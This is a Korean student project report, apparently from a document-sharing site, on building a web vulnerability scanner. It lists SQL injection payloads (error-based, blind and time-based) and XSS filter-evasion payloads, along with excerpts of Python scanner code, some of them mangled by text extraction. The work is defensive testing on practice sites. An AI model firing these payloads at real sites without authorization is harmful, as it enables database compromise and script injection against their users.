웹취약점스캐너프로젝트 2/15 목 차 1. 서론 연구의배경및목적 연구주제의요약설명 3 2. 웹취약점 SQL Injection XSS 3 3. 웹취약점점검패턴 SQL Injection 점검패턴 X
|
|
- 홍 범
- 6 years ago
- Views:
Transcription
1 웹취약점스캐너프로젝트 1/15 웹취약점스캐너제작 2014 년 11 월 10 일 대학교 동아리 인천대학교 OneScore 참여인원 김영성, 박현우, 김한슬 송동현, 라하연
2 웹취약점스캐너프로젝트 2/15 목 차 1. 서론 연구의배경및목적 연구주제의요약설명 3 2. 웹취약점 SQL Injection XSS 3 3. 웹취약점점검패턴 SQL Injection 점검패턴 XSS 점검패턴 6 4. 웹취약점탐지알고리즘 SQL Injection 탐지알고리즘 XSS 탐지알고리즘 결론 연구결과 기대효과및활용에대한건의 프로젝트수행시어려웠던점등기타의견 참고문헌 15
3 웹취약점스캐너프로젝트 3/15 1. 서론 1.1. 연구의배경및목적최근해킹사고의대다수가웹서버, 웹애플리케이션의취약점을공격하는방식의공격으로이루어짐에따라웹취약점을점검하고보완하는작업은선택이아닌필수가되고있다. 하지만이런상황에도불구하고많은중소기업에서는보안취약점을점검할수있는전문인력이없어웹취약점에그대로노출되고있다. 이러한기업들에게자신들의웹사이트의취약점을쉽게점검할수있는자동화프로그램이제공된다면, 중소기업들이보안문제를자각하고보완하려는시도를할것이고그에따라사이트들의보안상태도한층업그레이드될수있을것이다. 이프로젝트를통해웹취약점을탐지하는방법을학습하고, 이를이용해웹사이트의점검을쉽게할수있는자동화프로그램을만드는것을목표로한다 연구주제의요약설명우선, 웹취약점을탐지하는방법에대해학습하며탐지패턴들을정리한다. 이후에정리된탐지방법들을실습용으로구축된사이트를대상으로적용해보며웹취약점점검을자동화할수있는알고리즘을생각해본다. 최종적으로알고리즘을종합하여웹취약점스캐너를제작해본다. 본프로젝트에서는 SQL Injection과 XSS 공격에대해위의과정을진행한다. 2. 웹취약점 2.1. SQL Injection 일반적으로웹어플리케이션은사용자의정보를입력하는사용자로그인정보입력란이나게시판조회란, 게시판게시물번호등같이사용자에게입력, 조회할수있는인터페이스를제공한다. 웹어플리케이션사용자인터페이스의정보는데이터베이스에접근할수있는쿼리문으로전달되는데공격자는이렇게전달되는쿼리문을조작하여데이터베이스를조회, 조작할수있으며시스템까지도장악할수있게된다 XSS 자바스크립트처럼클라이언트측에서실행되는언어로작성된악성스크립트코드를웹페이지, 웹게시판또는이메일에포함시켜이를열람한사용자컴퓨터에서악성스크립트가실행되게하고사용자의개인정보등을유출시키는공격이다. XSS 취약점은웹페이지가사용자에게입력받은데이터를필터링하지않고그대로동적으로생성된웹페이지에포함하여사용자에게
4 웹취약점스캐너프로젝트 4/15 재전송할때발생한다. 3. 웹취약점점검패턴 3.1. SQL Injection 점검패턴 SQL Injection의점검은파라미터에 SQL문을삽입하고서버의 response값을확인하여취약성여부를판단한다. 삽입하는 SQL문과 response값의확인방법은아래와같다. A. 패턴 1 : 1ACUSTART'"ed9cWACUEND Error based SQL injection 공격기법으로 Error를유발시키는쿼리를입력하여쿼리가동작하는지확인한다. GET /listproducts.php?artist=1acustart'"ed9cwacuend Error가발생하지않음 Error 발생 B. 패턴 2 : AND 3*2*1=6 AND 00568=00568 Blind SQL Injection 공격기법으로서버에참인값과거짓인값의패턴을각각보 내본후결과값을비교하여취약점을판별한다. 1번 : GET /listproducts.php?artist=3 AND 3*2*1=6 AND 00568= 번 : GET /listproducts.php?artist=3 AND 3*2*1=2 AND 00568=00568 (artist=3은참이라고가정 ) 1번과 2번의서버응답값이동일하다. 1 번과 2 번의서버응답값이다르다.
5 웹취약점스캐너프로젝트 5/15 C. 패턴 3 : OR/*randomText*/0032=0032 특정키워드나기호사이의공백이필터링될경우, 공백을대체할수있는문자를 사용해진단할수있다. 공백을대체할수있는문자는아래표와같다. 1번 : GET /listproducts.php?artist=12 OR/*randomText*/0032=0032 2번 : GET /listproducts.php?artist=12 OR/*randomText*/0032=0030 (artist=12가거짓이라고가정 ) 1번과 2번의결과값이같다. 1 번의 2 번의결과값이다르다. 공백을대체하는문자혹은문자열원본 OR 0032=0032 /**/ OR/*randomText*/0032=0032 (, ) OR(0032)= OR+0032=0032 D. 패턴 4 : OR 0032 rlike 0032 특정연산자가필터링되었을경우, 다른연산자들을조합하여사용할수있다. 사 용할수있는연산자들은아래표와같다. 1번 : GET /listproducts.php?artist=12 OR 0032 rlike 번 : GET /listproducts.php?artist=12 OR 0032 rlike 0030 (artist=12가거짓이라고가정 ) 1번과 2번의결과값이같다. 1 번의 2 번의결과값이다르다. 연산자 ^ =!= % / * & && < > << >> >= <= <> <=> XOR DIV SOUNDS LIKE RLIKE REGEXP IS NOT BETWEEN
6 웹취약점스캐너프로젝트 6/15 E. 패턴 5: (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(6)))v)+' "+(select(0)from(select(sleep(9)))v)+"*/ Time based Blind SQL Injection 공격기법으로서버에서응답하는시간을확인 하여 쿼리문이 동작하는지 여부를 판단한다. 위 패턴에서는 서버 쿼리문의 injection 위치에따라 sleep함수의실행위치가다르다. 인용부호를사용하지않을경우 : sleep(3) 이실행 injection 지점이 를사용하는경우 : sleep(6) 이실행 injection 지점이 를사용하는경우 : sleep(9) 가실행 GET /listproducts.php?artist=(select(0)from(select(sleep(3)))v)/*'+ (select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/ 지연없이응답 3초 or 6초 or 9초의지연후에응답 3.2. XSS 점검패턴 XSS 점검은공격에사용되는태그 (<script>) 와자바스크립트함수 (alert, prompt 등 ) 를삽입하고 응답값에해당입력값이인코딩이나필터링되어있는지확인하는방식으로진행된다. A. 패턴 1 : >< XSS 공격에사용되는 ', ", >, < 문자를삽입하여인코딩여부를확인한다. GET /listproducts.php?artist='"><1d352<script>alert(1)</script> %27%22%3E%3C1d352%3Cscript%3Ealert%281%29%3C%2Fscript%3E '"><1d352<script>alert(1)</script> => <script>alert(1)</script> 동작 B. 패턴 2 : <sc<script>ript>prompt(973)<</script>/script> script 태그의입력을공백으로치환하여방어했을때, 우회할수있는방법 GET /listproducts.php?artist='"><<sc<script>ript>prompt(973)<</script>/script> '"><prompt(973) '"><<script>prompt(973)</script> => <script> 가삭제되면서숨겨진 script 동작
7 웹취약점스캐너프로젝트 7/15 C. 패턴 3 : <script >alert(1)</script > script 태그의입력을필터하는부분에서대소문자를구분하지않았을때, 우회할수있는방법 GET /listproducts.php?artist='"><<script>alert(1)</script> '"><alert(1) '"><<ScrIpT>alert(1)</sCRiPt> => <script> 필터링이적용되지않아스크립트동작 D. 패턴 4 : <img src=x onmouseover=alert(1) /> <img> 태그의속성값을이용해자바스크립트함수를실행시키는방법. onmouseover 외에도아래의표와같이다양한태그속성이존재한다. GET /search.php?test='"<><img SRC=# onmouseover="alert(1)"> <img src=x > => 속성값필터링 <img src=# onmouseover="alert(1)"> => 마우스를이미지에올리면함수실행 태그속성 onfocus bgsound onstop onselectstart onunload onmove onactivae onfocusin ondblclick href onclick onkeydown ondrag onstart onbeforecut onkeyup ondragenter onrowexit ondeactivate onload ondragover onpaste ondragend onbounce ondrop onresize ondragleave onmovestart oncopy onselect ondragstart onmouseout onfinish onscroll onerror onmouseup onreset onchange oncut onabort onsubmit onmovestart
8 웹취약점스캐너프로젝트 8/15 E. 패턴 5 : <SCRIPT/SRC=" 외부의 javascript 함수를호출하는방법 GET /search.php?test='"<><script/src=" 외부의 script함수실행외부의 javascript 소스필터링 F. 패턴 6 : 태그속성값의인코딩 - <IMG SRC= 인코딩된함수 > 태그의속성값은파싱될때 decoding과정을거치게된다. 따라서속성값은아래의표에나와있는인코딩방식으로인코딩후전송해도정상적으로실행된다. GET /search.php?test='"<><img SRC=javas	 9;ript:alert 0;'XSS')> 필터링혹은치환자바스크립트함수실행 인코딩 원본 UTF-8 유니코드인코딩세미콜론없는 Long UTF-8 유니코드인코딩세미콜론없는 Hex 인코딩 <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript: alert('xss')> <IMG SRC=&# &# &# &# &# &# &# &# &# &# &# &# &# &# &# &# &# &# &# &# &# &# &# > <IMG SRC=javascript:&#x 61lert('XSS')>
9 웹취약점스캐너프로젝트 9/15 4. 웹취약점탐지알고리즘 4.1. SQL Injection 탐지알고리즘 아래의그림과같은순서로 SQL injection 의취약성을판단한다. URL, Param 입력 : 사용자가 scanner 를실행할때, 점검할사이트와파라미터를입력. URL 유효성 Check : 사용자가입력한 URL 이정상적으로접속이되는지확인. Error Based SQLi 패턴점검 : 3.1 SQL Injection 점검패턴 중 Error Based Injection 패턴을사용하여취약여부를확인한다. Error Based SQLi 패턴점검 : 3.1 SQL Injection 점검패턴 중 Blind SQL Injection 패턴을사용하여취약여부를확인한다.
10 웹취약점스캐너프로젝트 10/ XSS 탐지알고리즘 아래의그림과같은순서로 XSS 의취약성을판단한다. URL, Param 입력 : 사용자가 scanner를실행할때, 점검할사이트와파라미터를입력. URL 유효성 Check : 사용자가입력한 URL이정상적으로접속이되는지확인. Cnt : 사용자가입력한 URL에파라미터를전송할때, Response 값에몇번출력되는지에따라점검횟수가달라지므로테스트문자 (TESTPARAM) 를파라미터로전송하여확인해본다. 문자열위치 : Response의 TESTPARAM의위치에따라패턴의형식이달라지므로위치확인. 패턴점검 : TESTPARAM의위치에따라응답횟수만큼각각의패턴을점검한다. 각각의패턴은 3.2 XSS 점검패턴 에서설명한패턴을사용한다.
11 웹취약점스캐너프로젝트 11/15 5. 결론 5.1. 연구결과 3.2 XSS 점검패턴 과 4.2 XSS 탐지알고리즘 을이용해 python 기반의 XSS Scanner를제작해보았다. 아래의표는소스코드의중요부분만발췌한것이다. # 위치에따른 XSS 탐지패턴 FUZZING_PAYLOADS_BASE = [ "<script>alert(1)</script>", "<script >alert(1)</script >", "<sc<script>ript>alert(1)<</script>/script>", "<script src= "<script>alert(string.fromcharcode(88,83,83));</script>", "<IMG \"\"\"><script>alert(\"xss\")</script>\">", "<img src=\"blah.jpg\" onerror=\"alert('xss')\"/>", "<IMG SRC=javascript:a
 8;ert('XSS')>", ] FUZZING_PAYLOADS_START_END_TAG = [ "\"'/><script >alert(1)</script >", "\"'\/><img src=2 onerror=\"alert(1)\" />", FUZZING_PAYLOADS_ATTR = [ "\"'><script>alert(1)</script>", "\"'><img src=2 onerror=\"alert(1)\"/>", # 데이터위치파악을위한 HTML Parser class MyHTMLParser(HTMLParser): def handle_comment(self, data): global OCCURENCE_PARSED if(testparam.lower() in data.lower()): OCCURENCE_PARSED += 1 if(occurence_parsed == OCCURENCE_NUM): raise Exception("comment") def handle_startendtag(self, tag, attrs):
12 웹취약점스캐너프로젝트 12/15 global OCCURENCE_PARSED global OPEN_EMPTY_TAG if (Testparam.lower() in str(attrs).lower()): OCCURENCE_PARSED += 1 if(occurence_parsed == OCCURENCE_NUM): OPEN_EMPTY_TAG = tag raise Exception("start_end_tag_attr") def handle_starttag(self, tag, attrs): def handle_endtag(self, tag): def handle_data(self, data): def html_parse(res): parser = MyHTMLParser() location = "" try: parser.feed(res.text) except Exception as e: location = str(e) except: printfail("error. That was bad. Some sort of parsing error happened. Try rerunning?") exit(-1) return location # 위치별 XSS 점검 def break_comment(): printhead("[*] Can comment be escaped to execute XSS?") payload = "--><script>alert(1);</script>" if( compareres(payload,payload) ): #payload = "--><script>alert(1);</script>" if( compareres(payload+"<!--", payload+"<!--") ):
13 웹취약점스캐너프로젝트 13/15 else: #Try a clean payload payload = "--><script>alert(1);</script><!--" if( compareres("-->", "-->") ): clean = compareres("<!--", "<!--") found = False for pl in FUZZING_PAYLOADS_BASE: pl = "-->" + pl if(clean): pl = pl + "<!--" if( compareres(urllib.quote_plus(pl), pl) ): #Working payload found! Add to payload list and break payload = pl found = True break if(not found): printfail("error. After trying all fuzzing attacks, none were successful. Check manually to confirm.") else: payload = "" printfail("error. Cannot escape comment because the --> string needed to close the comment is escaped.") if(payload): if(payload not in LIST_OF_PAYLOADS): LIST_OF_PAYLOADS.append(payload) printsucc("success. Parameter was reflected in a comment. Use the following payload to break out:") printsucc(payload) def break_script(): def break_data(): def break_start_end_attr(): def break_attr():
14 웹취약점스캐너프로젝트 14/15 XSS Scanner usage GET 과 POST 방식을지원하며, 사용방법은 URL 과 payload 를명시해주고실행하면된다. python xssscanner.py -u "URL" -p " 파라미터 =TESTPARAM" XSS 스캐너 Test 위그림은 XSS-Game 이라는 wargame 사이트에서 XSS 스캐너를테스트해본결과이다. 알고리 즘에서명시한대로 URL 유효성체크, 문자열반환개수확인, 위치별취약점여부점검 의순서 로진행한다 기대효과및활용에대한건의 웹서비스와다양한인터넷애플리케이션의웹취약점을점검해주는자동화환경구축 비교적간단한방법으로중고기업들의웹취약점자가점검가능 5.3. 프로젝트수행시어려웠던점등기타의견 취약성판단패턴의정리, 목록화 자동화를위한알고리즘의작성과이를코드로구현하는과정의어려움
15 웹취약점스캐너프로젝트 15/15 6. 참고문헌 Acunetix Web Vulnerability Scanner Vega Vulnerability Scanner - Subgraph KISA. 제 호웹서버구축보안점검안내서 OWASP XSS Prevention Cheat Sheet ( ) ( 웹해킹 ) XSS 공격우회방법 ( ) PentesterLab ( ) OWASP Top Internet & Security Focus 월호 Web Security Scan 10 November, 2013 Developer Report F5. SQL Injection Evasion Detection ( )
Javascript
1. 이벤트와이벤트핸들러의이해 이벤트 (Event) 는웹브라우저에서발생하는다양한사건을말합니다. 예를들면, 버튼을마우스로을했다거나브라우저를닫았다거나 Enter 키를눌렀다거나등등아주다양한사건들이있습니다. 그렇다면이벤트핸들러 (Event Handler) 는무엇일까요? 이다양한이벤트들을핸들링 ( 처리 ) 해주는것입니다. 예를들면, 어떤버튼을했을때메시지창이뜨게하는등을말합니다.
More informationPowerPoint 프레젠테이션
09 장 문서객체모델 1. 문서객체모델관련용어 2. 웹페이지생성순서 3. 문서객체선택 4. 문서객체조작 5. 이벤트 문서객체와문서객체모델의개념을이해한다. 문서객체를선택하고조작할수있다. 이벤트의종류를알아보고문서객체에이벤트를연결해본다. 1 문서객체모델관련용어 문서객체모델 (DOM) Document Object Model 웹브라우저가 HTML 파일을분석하고표시하는방법
More information제목 레이아웃
웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya
More informationObservational Determinism for Concurrent Program Security
웹응용프로그램보안취약성 분석기구현 소프트웨어무결점센터 Workshop 2010. 8. 25 한국항공대학교, 안준선 1 소개 관련연구 Outline Input Validation Vulnerability 연구내용 Abstract Domain for Input Validation Implementation of Vulnerability Analyzer 기존연구
More informationPowerPoint Template
JavaScript 회원정보 입력양식만들기 HTML & JavaScript Contents 1. Form 객체 2. 일반적인입력양식 3. 선택입력양식 4. 회원정보입력양식만들기 2 Form 객체 Form 객체 입력양식의틀이되는 태그에접근할수있도록지원 Document 객체의하위에위치 속성들은모두 태그의속성들의정보에관련된것
More informationPowerPoint Template
설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet
More informationMicrosoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc
분석보고서 이동현 (dhclub20@naver.com) SK Infosec Co., Inc MSS 사업본부침해대응팀모의해킹파트 Table of Contents 1. 개요... 3 1.1. 배경... 3 1.2. 목적... 3 2. 공격분석... 4 2.1. Cookie Injection... 4 2.2. Cookie Injection의발생원인... 5 2.3.
More informationvar answer = confirm(" 확인이나취소를누르세요."); // 확인창은사용자의의사를묻는데사용합니다. if(answer == true){ document.write(" 확인을눌렀습니다."); else { document.write(" 취소를눌렀습니다.");
자바스크립트 (JavaScript) - HTML 은사용자에게인터페이스 (interface) 를제공하는언어 - 자바스크립트는서버로데이터를전송하지않고서할수있는데이터처리를수행한다. - 자바스크립트는 HTML 나 JSP 에서작성할수있고 ( 내부스크립트 ), 별도의파일로도작성이가능하다 ( 외 부스크립트 ). - 내부스크립트 - 외부스크립트
More informationPowerPoint 프레젠테이션
HTML5 웹프로그래밍입문 10 장. 이벤트처리와동적 웹문서 목차 10.1 이벤트처리하기 10.2 동적웹문서만들기 10.3 다양한방법으로폼다루기 2 10.1 이벤트처리하기 10.1.1 이벤트처리개요 10.1.2 이벤트의정의와종류 10.1.3 이벤트핸들링및이벤트등록 10.1.4 폼다루기 3 이벤트처리개요 이벤트 사용자가웹브라우저를사용하는중에발생시키는키보드, 마우스등의입력
More information제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호
제이쿼리 () 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호 CSS와마찬가지로, 문서에존재하는여러엘리먼트를접근할수있다. 엘리먼트접근방법 $( 엘리먼트 ) : 일반적인접근방법
More informationSecure Programming Lecture1 : Introduction
Malware and Vulnerability Analysis Lecture4-1 Vulnerability Analysis #4-1 Agenda 웹취약점점검 웹사이트취약점점검 HTTP and Web Vulnerability HTTP Protocol 웹브라우저와웹서버사이에하이퍼텍스트 (Hyper Text) 문서송수신하는데사용하는프로토콜 Default Port
More informationXSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks
XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여
More information(Microsoft PowerPoint - 8\300\345.ppt [\310\243\310\257 \270\360\265\345])
제8장이벤트와 이벤트와이벤트핸들러다루기 학습목표 이벤트와이벤트핸들러를이해하고사용할수있다. event 객체로마우스나키보드의동작을 동작을제어하고관리할 관리할수있다. 목차 8.1 이벤트와이벤트핸들러 8.2 event 객체 2 자바스크립트는넷스케이프사에서넷스케이프웹브라우저를위해자체적으로개발한스크립트언어 자바스크립트는 HTML 페이지를향상시키고자바애플릿을쉽게제어하도록설계
More information기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라.
기술문서 14. 11. 10. 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 dokymania@naver.com I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라. Exploit 5 마. 피해 6 III. 결론 6 가. 권고사항 6 I. 소개 가. 역자 본문서는
More informationJavascript.pages
JQuery jquery part1 JavaScript : e-mail:leseraphina@naver.com http://www.webhard.co.kr I.? 2 ......,,. : : html5 ; ; .
More informationResearch & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W
Research & Technique Apache Tomcat RCE 취약점 (CVE-2019-0232) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE-2019-0232 취약점은 Windows 시스템의 Apache Tomcat 서버에서 enablecmdlinearguments
More information2
2 3 4 5 6 7 8 9 10 Game 11 12 13 14 15 16 17 18 19 20 1 2 3 21 22 Check List Check List Check List 23 24 25 26 27 28 HOT CLICK 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 HIS GAME FOCUS 48
More informationMicrosoft Word - CrossSiteScripting[XSS].docx
1 Education Giehong.E goodbyestar@nate.com abstract - 영리를목적으로한곳에서의불법적인배포는금지합니다. - 문서의내용은임의의가상테스트를대상으로한 OWASP10 의기본적인내용들이며교육을위해만들어진문서입니다. - 비인가받은악의적인행동은불법이며법적책임또한당사자에게있습니다 Copyright@2008 All Rights Reserved
More informationMicrosoft PowerPoint - web-part01-ch05-함수.pptx
과목명 : 웹프로그래밍응용교재 : 모던웹을위한 JavaScript Jquery 입문, 한빛미디어 Part1. JavaScript / Ch05. 함수 2014년 1학기 Professor Seung-Hoon Choi 5. 1 익명함수 함수 코드의집합을나타내는자료형 형식 var 함수이름 = function( ) { }; function( ) { } 부분은이름이없는익명함수임
More information2
2 3 4 5 6 7 8 9 10 Game 11 12 13 14 15 16 17 18 19 20 21 22 Check List Check List Check List 23 24 25 www.khgames.co.kr 26 27 28 HOT CLICK 29 30 31 32 33 34 [ INTERVIEW ] Q Q Q Q 35 Q. Q. Q. 36 Global
More informationMicrosoft PowerPoint - aj-lecture1-HTML-CSS-JS.ppt [호환 모드]
Web Technology Stack HTML, CSS, JS Basics HTML Tutorial https://www.w3schools.com/html/default.asp CSS Tutorial https://www.w3schools.com/css/default.asp JS Tutorial 524730-1 2019 년봄학기 3/11/2019 박경신 https://www.w3schools.com/html/default.asp
More information다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");
다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp"); dispatcher.forward(request, response); - 위의예에서와같이 RequestDispatcher
More informationAhnLab_template
해킹과침해대응 웹해킹과대응 2013. 10. 17 ( 목 ) 안랩 ASEC 대응팀문영조 Contents 01 웹해킹과취약점 02 웹해킹기법에대한이해 03 웹해킹과침해대응 04 결론 01 웹해킹과취약점 개요 01. 웹해킹과취약점 < 출처 - IBM X-Force 2012 Annual Trend & Risk Report> 4 개요 01. 웹해킹과취약점 웹해킹 (Web
More information** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름
EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection
More information로거 자료실
redirection 매뉴얼 ( 개발자용 ) V1.5 Copyright 2002-2014 BizSpring Inc. All Rights Reserved. 본문서에대한저작권은 비즈스프링 에있습니다. - 1 - 목차 01 HTTP 표준 redirect 사용... 3 1.1 HTTP 표준 redirect 예시... 3 1.2 redirect 현상이여러번일어날경우예시...
More information(Microsoft Word - \301\266\301\326\272\300_XSS.docx)
XSS(Cross Site Scripting) 1. XSS 란무엇인가 XSS 란 Cross Site Scripting 의약자 (CSS 라고도불리기도하나 Cascading Style Sheets 와혼용되어일반적으로 XSS 를많이사용한다.) 로 Web 보안취약점중하나이다. 이러한 XSS 는인터넷이생겨나고활성화되기전, 홈페이지소개및단지정보를제공하는정적인페이지에서인터넷이활성화된현재,
More informationPowerPoint 프레젠테이션
실습 1 배효철 th1g@nate.com 1 목차 조건문 반복문 System.out 구구단 모양만들기 Up & Down 2 조건문 조건문의종류 If, switch If 문 조건식결과따라중괄호 { 블록을실행할지여부결정할때사용 조건식 true 또는 false값을산출할수있는연산식 boolean 변수 조건식이 true이면블록실행하고 false 이면블록실행하지않음 3
More informationEclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일
Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 Introduce Me!!! Job Jeju National University Student Ubuntu Korean Jeju Community Owner E-Mail: ned3y2k@hanmail.net Blog: http://ned3y2k.wo.tc Facebook: http://www.facebook.com/gyeongdae
More information2
2 3 4 5 6 7 8 40% 4% 2% 22% 4% 0% 11% 18% 9 10 Game 11 12 13 14 15 16 17 18 19 20 21 22 Check List Check List Check List 23 24 25 26 27 28 HOT CLICK 29 30 31 32 33 34 35 36 37 38 39 40 41 www.khgames.co.kr
More informationMicrosoft PowerPoint - web-part03-ch20-XMLHttpRequest기본.pptx
과목명 : 웹프로그래밍응용교재 : 모던웹을위한 JavaScript Jquery 입문, 한빛미디어 Part3. Ajax Ch20. XMLHttpRequest 2014년 1학기 Professor Seung-Hoon Choi 20 XMLHttpRequest XMLHttpRequest 객체 자바스크립트로 Ajax를이용할때사용하는객체 간단하게 xhr 이라고도부름 서버
More informationPowerPoint 프레젠테이션
10 장 jquery 라이브러리 1. jquery 라이브러리설정 2. 문서객체선택 3. 문서객체조작 4. 이벤트 5. 효과 HTML 페이지에 jquery 라이브러리를추가한다. jquery 라이브러리를사용해문서객체를조작할수있다. jquery 라이브러리를사용해문서객체에효과를부여한다. jquery 플러그인을활용한다. 기본예제 10-1 jquery 라이브러리설정하기
More informationSOFTBASE XFRAME DEVELOPMENT GUIDE SERIES HTML 연동가이드 서울특별시구로구구로 3 동한신 IT 타워 1215 호 Phone Fax Co
SOFTBASE XFRAME DEVELOPMENT GUIDE SERIES 2012.02.18 서울특별시구로구구로 3 동한신 IT 타워 1215 호 Phone 02-2108-8030 Fax 02-2108-8031 www.softbase.co.kr Copyright 2010 SOFTBase Inc. All rights reserved 목차 1 장 : HTML 연동개요...
More information17장 클래스와 메소드
17 장클래스와메소드 박창이 서울시립대학교통계학과 박창이 ( 서울시립대학교통계학과 ) 17 장클래스와메소드 1 / 18 학습내용 객체지향특징들객체출력 init 메소드 str 메소드연산자재정의타입기반의버전다형성 (polymorphism) 박창이 ( 서울시립대학교통계학과 ) 17 장클래스와메소드 2 / 18 객체지향특징들 객체지향프로그래밍의특징 프로그램은객체와함수정의로구성되며대부분의계산은객체에대한연산으로표현됨객체의정의는
More information2
2 3 4 5 6 7 8 9 10 am Game 11 12 13 14 15 16 17 18 19 20 1 2 3 21 22 Check List Check List Check List 23 24 25 www.khgames.co.kr 26 27 28 HOT CLICK 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46
More information인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8
차단 IP 국적 공격유형 목적지포트 IPS 룰 222.119.190.175 한국 서비스취약점공격 TCP/110 #14713(POP3 Login Brute Force Attempt-2/3(count 30 seconds 10)) 52.233.160.51 네덜란드 웹해킹 TCP/80 Apache Struts Jakarta Multipart Parser Remote
More informationEDB 분석보고서 (04.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj
EDB 분석보고서 (04.03) 04.03.0~04.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 03월에공개된 Exploit-DB의분석결과, 해커들이가장많이시도하는공격으로알려져있는 SQL Injection 공격에대한보고개수가가장많았습니다. 무엇보다주의가필요한부분은
More information< F33BFF920C0CEC5CDB3DD20C4A7C7D8BBE7B0ED20B5BFC7E220B9D720BAD0BCAEBFF9BAB828C3D6C1BEBABB292E687770>
악성코드유포지 경유지의공격코드와보안취약점 1. 개요 본고에서는인터넷침해사고대응지원센터에서자체개발 적용하고있는악성코드은닉사이트탐지프로그램에서 2006년 1월부터 3월까지탐지한사이트중 50개를대상으로공격코드및관련소프트웨어취약점을분석한다. 먼저 ( 그림 1) 에서악성코드유포와경유지를구분하고, 2005년이후게재되었던 인터넷침해사고동향및분석월보 관련기사를해당부분에적어보았다.
More informationPowerPoint 프레젠테이션
HTML5 웹프로그래밍입문 부록. 웹서버구축하기 1 목차 A.1 웹서버시스템 A.2 PHP 사용하기 A.3 데이터베이스연결하기 2 A.1 웹서버시스템 3 웹서버의구축 웹서버컴퓨터구축 웹서버소프트웨어설치및실행 아파치 (Apache) 웹서버가대표적 서버실행프로그램 HTML5 폼을전달받아처리 PHP, JSP, Python 등 데이터베이스시스템 서버측에데이터를저장및효율적관리
More informationPowerPoint 프레젠테이션
Ruby Programming 8 Web Crawling 한국어정보의전산처리 2017. 5. 24. Web Crawling 의요소기술 웹에접속하여웹문서읽어오기 open-uri 나 net/http 라이브러리이용. 웹문서분석 xml/html parser 라이브러리 ( 예 : nokogiri) 를이용할수도있으나 간단한분석일때는 scan 등의함수로정규표현을검색하여처리할수도있음.
More informationMicrosoft PowerPoint - chap05-제어문.pptx
int num; printf( Please enter an integer: "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); 1 학습목표 제어문인,, 분기문에 대해 알아본다. 인 if와 switch의 사용 방법과 사용시 주의사항에 대해 알아본다.
More information쉽게 풀어쓴 C 프로그래밍
